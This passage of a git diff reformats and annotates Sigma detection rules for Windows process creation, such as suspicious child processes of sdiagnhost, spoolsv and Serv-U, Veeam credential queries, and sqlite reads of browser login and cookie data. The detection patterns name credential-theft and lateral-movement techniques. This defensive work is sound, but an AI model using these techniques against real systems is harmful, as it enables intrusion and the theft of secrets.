-bg' + # ParentImage|endswith: ':\Windows\System32\svchost.exe' + - CommandLine|endswith: + - ' -c' + - ' -f' + - ' -mm' + - ' -t' + - CommandLine|contains: ' -m -bg' filter_main_null: - CommandLine: null + CommandLine: filter_main_empty: - CommandLine: '' + CommandLine: '' condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sdclt_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_sdclt_child_process.yml index 9950b25f5..25c6ed130 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sdclt_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sdclt_child_process.yml @@ -1,8 +1,7 @@ title: Sdclt Child Processes id: da2738f2-fadb-4394-afa7-0a0674885afa status: test -description: A General detection for sdclt spawning new processes. This could be an - indicator of sdclt being used for bypass UAC techniques. +description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/6 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md diff --git a/sigma/sysmon/process_creation/proc_creation_win_sdiagnhost_susp_child.yml b/sigma/sysmon/process_creation/proc_creation_win_sdiagnhost_susp_child.yml index 45939b9f2..f0860298d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sdiagnhost_susp_child.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sdiagnhost_susp_child.yml @@ -1,8 +1,7 @@ title: Sdiagnhost Calling Suspicious Child Process id: f3d39c45-de1a-4486-a687-ab126124f744 status: test -description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used - in exploits for Follina / CVE-2022-30190) +description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190) references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ @@ -26,6 +25,7 @@ detection: selection: ParentImage|endswith: \sdiagnhost.exe Image|endswith: + # Add more suspicious LOLBins - \powershell.exe - \pwsh.exe - \cmd.exe @@ -35,7 +35,8 @@ detection: - \taskkill.exe - \regsvr32.exe - \rundll32.exe - - \calc.exe + # - '\csc.exe' # https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/ + - \calc.exe # https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_secedit_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_secedit_execution.yml index 09392e2cb..35bd63ee6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_secedit_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_secedit_execution.yml @@ -1,8 +1,7 @@ title: Potential Suspicious Activity Using SeCEdit id: c2c76b77-32be-4d1f-82c9-7e544bdfe0eb status: test -description: Detects potential suspicious behaviour using secedit.exe. Such as exporting - or modifying the security policy +description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy references: - https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit @@ -38,16 +37,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \secedit.exe - - OriginalFileName: SeCEdit + - Image|endswith: \secedit.exe + - OriginalFileName: SeCEdit selection_flags_discovery: - CommandLine|contains|all: + CommandLine|contains|all: - /export - /cfg selection_flags_configure: - CommandLine|contains|all: + CommandLine|contains|all: - /configure - /db + # filter: + # SubjectUserName|endswith: '$' SubjectUserName is from event ID 4719 in the Windows Security log condition: process_creation and (selection_img and (1 of selection_flags_*)) falsepositives: - Legitimate administrative use diff --git a/sigma/sysmon/process_creation/proc_creation_win_servu_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_servu_susp_child_process.yml index fd3029a39..6f99c70be 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_servu_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_servu_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Serv-U Process Pattern id: 58f4ea09-0fc2-4520-ba18-b85c540b0eaf status: test -description: Detects a suspicious process pattern which could be a sign of an exploited - Serv-U service +description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ author: Florian Roth (Nextron Systems) @@ -32,7 +31,7 @@ detection: - \bash.exe - \schtasks.exe - \regsvr32.exe - - \wmic.exe + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - \mshta.exe - \rundll32.exe - \msiexec.exe @@ -40,7 +39,6 @@ detection: - \scriptrunner.exe condition: process_creation and selection falsepositives: - - Legitimate uses in which users or programs use the SSH service of Serv-U for - remote command execution + - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_setspn_spn_enumeration.yml b/sigma/sysmon/process_creation/proc_creation_win_setspn_spn_enumeration.yml index 571bfbfdc..b6c408ae4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_setspn_spn_enumeration.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_setspn_spn_enumeration.yml @@ -20,13 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_pe: - - Image|endswith: \setspn.exe - - OriginalFileName: setspn.exe - - Description|contains|all: - - Query or reset the computer - - SPN attribute + - Image|endswith: \setspn.exe + - OriginalFileName: setspn.exe + - Description|contains|all: + - Query or reset the computer + - SPN attribute selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -q ' - ' /q ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_shutdown_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_shutdown_execution.yml index c02c6fed6..f596a2654 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_shutdown_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_shutdown_execution.yml @@ -20,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \shutdown.exe - CommandLine|contains: + CommandLine|contains: - '/r ' - '/s ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_shutdown_logoff.yml b/sigma/sysmon/process_creation/proc_creation_win_shutdown_logoff.yml index ef29e95d8..824dc9fb4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_shutdown_logoff.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_shutdown_logoff.yml @@ -20,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \shutdown.exe - CommandLine|contains: /l + CommandLine|contains: /l condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sndvol_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_sndvol_susp_child_processes.yml index c3bbb2550..945da3adf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sndvol_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sndvol_susp_child_processes.yml @@ -1,8 +1,7 @@ title: Uncommon Child Processes Of SndVol.exe id: ba42babc-0666-4393-a4f7-ceaf5a69191e status: experimental -description: Detects potentially uncommon child processes of SndVol.exe (the Windows - volume mixer) +description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) references: - https://twitter.com/Max_Mal_/status/1661322732456353792 author: X__Junior (Nextron Systems) @@ -21,7 +20,7 @@ detection: ParentImage|endswith: \SndVol.exe filter_main_rundll32: Image|endswith: \rundll32.exe - CommandLine|contains: ' shell32.dll,Control_RunDLL ' + CommandLine|contains: ' shell32.dll,Control_RunDLL ' condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_soundrecorder_audio_capture.yml b/sigma/sysmon/process_creation/proc_creation_win_soundrecorder_audio_capture.yml index d2a2832cc..b0240438f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_soundrecorder_audio_capture.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_soundrecorder_audio_capture.yml @@ -21,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \SoundRecorder.exe - CommandLine|contains: /FILE + CommandLine|contains: /FILE condition: process_creation and selection falsepositives: - Legitimate audio capture by legitimate user. diff --git a/sigma/sysmon/process_creation/proc_creation_win_splwow64_cli_anomaly.yml b/sigma/sysmon/process_creation/proc_creation_win_splwow64_cli_anomaly.yml index 3b9bf97f9..4446bd385 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_splwow64_cli_anomaly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_splwow64_cli_anomaly.yml @@ -20,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \splwow64.exe - CommandLine|endswith: splwow64.exe + CommandLine|endswith: splwow64.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml index f97316ed8..2712fd8a3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml @@ -53,18 +53,18 @@ detection: - \net.exe - \net1.exe suspicious_net_filter: - CommandLine|contains: start + CommandLine|contains: start suspicious_cmd: Image|endswith: \cmd.exe suspicious_cmd_filter: - CommandLine|contains: + CommandLine|contains: - .spl - route add - program files suspicious_netsh: Image|endswith: \netsh.exe suspicious_netsh_filter: - CommandLine|contains: + CommandLine|contains: - add portopening - rule name suspicious_powershell: @@ -72,16 +72,13 @@ detection: - \powershell.exe - \pwsh.exe suspicious_powershell_filter: - CommandLine|contains: .spl + CommandLine|contains: .spl suspicious_rundll32_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE suspicious_rundll32_cli: - CommandLine|endswith: rundll32.exe - condition: process_creation and (spoolsv and ( suspicious_unrestricted or (suspicious_net - and not suspicious_net_filter) or (suspicious_cmd and not suspicious_cmd_filter) - or (suspicious_netsh and not suspicious_netsh_filter) or (suspicious_powershell - and not suspicious_powershell_filter) or all of suspicious_rundll32_* )) + CommandLine|endswith: rundll32.exe + condition: process_creation and (spoolsv and ( suspicious_unrestricted or (suspicious_net and not suspicious_net_filter) or (suspicious_cmd and not suspicious_cmd_filter) or (suspicious_netsh and not suspicious_netsh_filter) or (suspicious_powershell and not suspicious_powershell_filter) or all of suspicious_rundll32_* )) fields: - Image - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml index cd3406c13..3c079a117 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml @@ -1,8 +1,7 @@ title: Veeam Backup Database Suspicious Query id: 696bfb54-227e-4602-ac5b-30d9d2053312 status: experimental -description: Detects potentially suspicious SQL queries using SQLCmd targeting the - Veeam backup databases in order to steal information. +description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +19,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_sql: Image|endswith: \sqlcmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - VeeamBackup - 'From ' selection_db: - CommandLine|contains: + CommandLine|contains: - BackupRepositories - Backups - Credentials diff --git a/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml b/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml index fd7bfdfc4..cff217f7e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml @@ -22,7 +22,7 @@ detection: selection_tools: Image|endswith: \sqlcmd.exe selection_query: - CommandLine|contains|all: + CommandLine|contains|all: - SELECT - TOP - '[VeeamBackup].[dbo].[Credentials]' diff --git a/sigma/sysmon/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml b/sigma/sysmon/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml index f99ec520a..b82bc3d16 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml @@ -1,8 +1,7 @@ title: SQLite Chromium Profile Data DB Access id: 24c77512-782b-448a-8950-eddb0785fc71 status: test -description: Detect usage of the "sqlite" binary to query databases in Chromium-based - browsers for potential data stealing. +description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. references: - https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows - https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ @@ -24,20 +23,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sql: - - Product: SQLite - - Image|endswith: - - \sqlite.exe - - \sqlite3.exe + - Product: SQLite + - Image|endswith: + - \sqlite.exe + - \sqlite3.exe selection_chromium: - CommandLine|contains: - - \User Data\ - - \Opera Software\ - - \ChromiumViewer\ + CommandLine|contains: + - \User Data\ # Most common folder for user profile data among Chromium browsers + - \Opera Software\ # Opera + - \ChromiumViewer\ # Sleipnir (Fenrir) selection_data: - CommandLine|contains: - - Login Data + CommandLine|contains: + - Login Data # Passwords - Cookies - - Web Data + - Web Data # Credit cards, autofill data - History - Bookmarks condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml b/sigma/sysmon/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml index 2a18d4db7..da3ad9457 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml @@ -1,8 +1,7 @@ title: SQLite Firefox Profile Data DB Access id: 4833155a-4053-4c9c-a997-777fcea0baa7 status: test -description: Detect usage of the "sqlite" binary to query databases in Firefox and - other Gecko-based browsers for potential data stealing. +description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows - https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ @@ -23,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sql: - - Product: SQLite - - Image|endswith: - - \sqlite.exe - - \sqlite3.exe + - Product: SQLite + - Image|endswith: + - \sqlite.exe + - \sqlite3.exe selection_firefox: - CommandLine|contains: + CommandLine|contains: - cookies.sqlite - - places.sqlite + - places.sqlite # Bookmarks, history condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_squirrel_download.yml b/sigma/sysmon/process_creation/proc_creation_win_squirrel_download.yml index 46d409e36..800e5af24 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_squirrel_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_squirrel_download.yml @@ -1,22 +1,18 @@ title: Arbitrary File Download Via Squirrel.EXE id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c related: - - id: 45239e6a-b035-4aaf-b339-8ad379fcb67e - type: similar - - id: fa4b21c9-0057-4493-b289-2556416ae4d7 - type: obsoletes + - id: 45239e6a-b035-4aaf-b339-8ad379fcb67e + type: similar + - id: fa4b21c9-0057-4493-b289-2556416ae4d7 + type: obsoletes status: experimental -description: 'Detects the usage of the "Squirrel.exe" to download arbitrary files. - This binary is part of multiple Electron based software installations (Slack, - Teams, Discord, etc.) - - ' +description: | + Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/ - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/ - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ -author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan - Ribeiro, oscd.community +author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2022/06/09 modified: 2023/11/09 tags: @@ -36,15 +32,14 @@ detection: - \squirrel.exe - \update.exe selection_download_cli: - CommandLine|contains: + CommandLine|contains: - ' --download ' - ' --update ' - ' --updateRollback=' selection_download_http_keyword: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (all of selection_*) falsepositives: - - Expected FP with some Electron based applications such as (1Clipboard, Beaker - Browser, Caret, Discord, GitHub Desktop, etc.) + - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_squirrel_proxy_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_squirrel_proxy_execution.yml index 34b99752f..9e6eac82c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_squirrel_proxy_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_squirrel_proxy_execution.yml @@ -1,22 +1,18 @@ title: Process Proxy Execution Via Squirrel.EXE id: 45239e6a-b035-4aaf-b339-8ad379fcb67e related: - - id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c - type: similar - - id: fa4b21c9-0057-4493-b289-2556416ae4d7 - type: obsoletes + - id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c + type: similar + - id: fa4b21c9-0057-4493-b289-2556416ae4d7 + type: obsoletes status: experimental -description: 'Detects the usage of the "Squirrel.exe" binary to execute arbitrary - processes. This binary is part of multiple Electron based software installations - (Slack, Teams, Discord, etc.) - - ' +description: | + Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/ - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/ - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ -author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan - Ribeiro, oscd.community +author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2022/06/09 modified: 2023/11/09 tags: @@ -36,43 +32,42 @@ detection: - \squirrel.exe - \update.exe selection_exec: - CommandLine|contains: + CommandLine|contains: - --processStart - --processStartAndWait - --createShortcut filter_optional_discord: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\Discord\Update.exe - ' --processStart' - Discord.exe filter_optional_github_desktop: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\GitHubDesktop\Update.exe - GitHubDesktop.exe - CommandLine|contains: + CommandLine|contains: - --createShortcut - --processStartAndWait filter_optional_teams: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\Microsoft\Teams\Update.exe - Teams.exe - CommandLine|contains: + CommandLine|contains: - --processStart - --createShortcut filter_optional_yammer: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\yammerdesktop\Update.exe - Yammer.exe - CommandLine|contains: + CommandLine|contains: - --processStart - --createShortcut condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - - Expected FP with some Electron based applications such as (1Clipboard, Beaker - Browser, Caret, Discord, GitHub Desktop, etc.) + - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_ssh_port_forward.yml b/sigma/sysmon/process_creation/proc_creation_win_ssh_port_forward.yml index 03246c088..6585698ba 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ssh_port_forward.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ssh_port_forward.yml @@ -23,7 +23,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \ssh.exe - CommandLine|contains: + CommandLine|contains: - ' -R ' - ' /R ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_ssh_rdp_tunneling.yml b/sigma/sysmon/process_creation/proc_creation_win_ssh_rdp_tunneling.yml index 03ee8b48b..739fb85f3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ssh_rdp_tunneling.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ssh_rdp_tunneling.yml @@ -1,11 +1,10 @@ title: Potential RDP Tunneling Via SSH id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d related: - - id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da - type: similar + - id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da # plink.exe + type: similar status: test -description: Execution of ssh.exe to perform data exfiltration and tunneling through - RDP +description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ author: Nasreddine Bencherchali (Nextron Systems) @@ -24,7 +23,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \ssh.exe - CommandLine|contains: :3389 + CommandLine|contains: :3389 condition: process_creation and selection falsepositives: - Administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_ssm_agent_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_ssm_agent_abuse.yml index bdf8d31bc..3b6c85f60 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ssm_agent_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ssm_agent_abuse.yml @@ -1,8 +1,7 @@ title: Potential Amazon SSM Agent Hijacking id: d20ee2f4-822c-4827-9e15-41500b1fff10 status: experimental -description: Detects potential Amazon SSM agent hijack attempts as outlined in the - Mitiga research report. +description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. references: - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/ @@ -23,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \amazon-ssm-agent.exe - CommandLine|contains|all: + CommandLine|contains|all: - '-register ' - '-code ' - '-id ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_stordiag_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_stordiag_susp_child_process.yml index 45f8d718d..9585f3132 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_stordiag_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_stordiag_susp_child_process.yml @@ -1,8 +1,7 @@ title: Execution via stordiag.exe id: 961e0abb-1b1e-4c84-a453-aafe56ad0d34 status: test -description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe - and fltmc.exe +description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe references: - https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html - https://twitter.com/eral4m/status/1451112385041911809 @@ -27,7 +26,7 @@ detection: - \systeminfo.exe - \fltmc.exe filter: - ParentImage|startswith: + ParentImage|startswith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder" - c:\windows\system32\ - c:\windows\syswow64\ condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_16bit_application.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_16bit_application.yml index 167dd71b7..2457c7958 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_16bit_application.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_16bit_application.yml @@ -1,9 +1,7 @@ title: Start of NT Virtual DOS Machine id: 16905e21-66ee-42fe-b256-1318ada2d770 status: test -description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit - Windows operating systems, as well as the execution of both 16-bit and 32-bit - DOS applications +description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications references: - https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support - https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7 diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml index bec8fc8b5..cdb427691 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml @@ -28,20 +28,20 @@ detection: - \wininit.exe - \spoolsv.exe - \searchindexer.exe - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - \cmd.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Cmd.Exe + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - \cmd.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Cmd.Exe filter: - CommandLine|contains|all: + CommandLine|contains|all: - ' route ' - ' ADD ' condition: process_creation and (all of selection_* and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml index a8c70c71e..02a2a7c9b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml @@ -1,11 +1,10 @@ title: Add User to Local Administrators Group id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 related: - - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e - type: similar + - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e # Remote Desktop groups + type: similar status: test -description: Detects suspicious command line that adds an account to the local administrators/administrateurs - group +description: Detects suspicious command line that adds an account to the local administrators/administrateurs group references: - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -23,16 +22,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_main: - - CommandLine|contains|all: - - 'localgroup ' - - ' /add' - - CommandLine|contains|all: - - 'Add-LocalGroupMember ' - - ' -Group ' + - CommandLine|contains|all: + # net.exe + - 'localgroup ' + - ' /add' + - CommandLine|contains|all: + # powershell.exe + - 'Add-LocalGroupMember ' + - ' -Group ' selection_group: - CommandLine|contains: + CommandLine|contains: - ' administrators ' - - ' administrateur' + - ' administrateur' # Typo without an 'S' so we catch both condition: process_creation and (all of selection_*) falsepositives: - Administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml index 59b71999d..57b950218 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml @@ -1,11 +1,10 @@ title: Suspicious Add User to Remote Desktop Users Group id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e related: - - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 - type: similar + - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 # Admin groups + type: similar status: test -description: Detects suspicious command line in which a user gets added to the local - Remote Desktop Users group +description: Detects suspicious command line in which a user gets added to the local Remote Desktop Users group references: - https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/ author: Florian Roth (Nextron Systems) @@ -26,17 +25,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_main: - - CommandLine|contains|all: - - 'localgroup ' - - ' /add' - - CommandLine|contains|all: - - 'Add-LocalGroupMember ' - - ' -Group ' + - CommandLine|contains|all: + - 'localgroup ' + - ' /add' + - CommandLine|contains|all: + - 'Add-LocalGroupMember ' + - ' -Group ' selection_group: - CommandLine|contains: + CommandLine|contains: - Remote Desktop Users - - "Utilisateurs du Bureau \xE0 distance" - - Usuarios de escritorio remoto + - Utilisateurs du 